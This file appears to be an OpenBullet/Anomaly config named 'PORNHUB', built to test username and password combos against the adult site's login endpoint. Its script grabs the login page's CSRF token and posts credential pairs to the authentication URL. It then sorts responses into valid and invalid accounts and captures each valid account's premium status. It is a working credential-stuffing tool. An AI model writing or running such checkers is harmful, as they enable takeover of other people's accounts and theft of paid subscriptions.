[SETTINGS]
{
  "Name": "PORNHUB",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-02-08T22:27:15.2593871-05:00",
  "AdditionalInfo": "",
  "Author": "TheArchitect",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.pornhub.com" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "token\" value=\"" "\" />" -> VAR "TOKEN" 

REQUEST POST "https://www.pornhub.com/front/authenticate" 
  CONTENT "redirect=OqRUDIi7cVO_lo8lBU2ALzqrY5pRffBHjPc65zl2ylU&token=<TOKEN>&remember_me=1&from=pc_login_modal_%3Aindex&username=<USER>&password=<PASS>&subscribe=undefined&setSendTip=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"success\":\"0\",\"" 
  KEYCHAIN Success OR 
    KEY "{\"success\":\"1\",\"" 

PARSE "<SOURCE>" LR "premium_redirect_cookie\":\"" "\"," CreateEmpty=FALSE -> CAP "PREMIUM" 

